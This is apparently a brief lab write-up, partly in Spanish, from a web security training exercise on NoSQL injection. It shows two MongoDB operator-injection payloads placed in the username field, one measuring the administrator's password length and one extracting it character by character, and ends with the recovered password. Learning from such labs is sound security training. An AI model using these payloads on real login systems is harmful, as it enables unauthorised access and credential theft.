02 Lab: Exploiting NoSQL injection to extract data
Previous01 Lab Detecting NoSQL injection 17efab5460ec80e19ec7ee42c9d3a627Next04 Lab: Exploiting NoSQL operator injection to extract unknown fields
Last updated
Last updated
The login functionality for this lab is powered by a MongoDB NoSQL database. It is vulnerable to NoSQL injection using MongoDB operators.
To solve the lab, log into the application as the
administrator
user.You can log in to your own account using the following credentials:
wiener:peter
.
Cambiamos el parametro de usuario a administrator' && this.password.length < 30 || 'a'=='b
,
administrator' && this.password[$0$]=='$a$
La contraseƱa es de 8 caracteres
2
q
3
q
7
d
1
f
6
z
0
n
4
v
User: administrator Password:nfqqvczd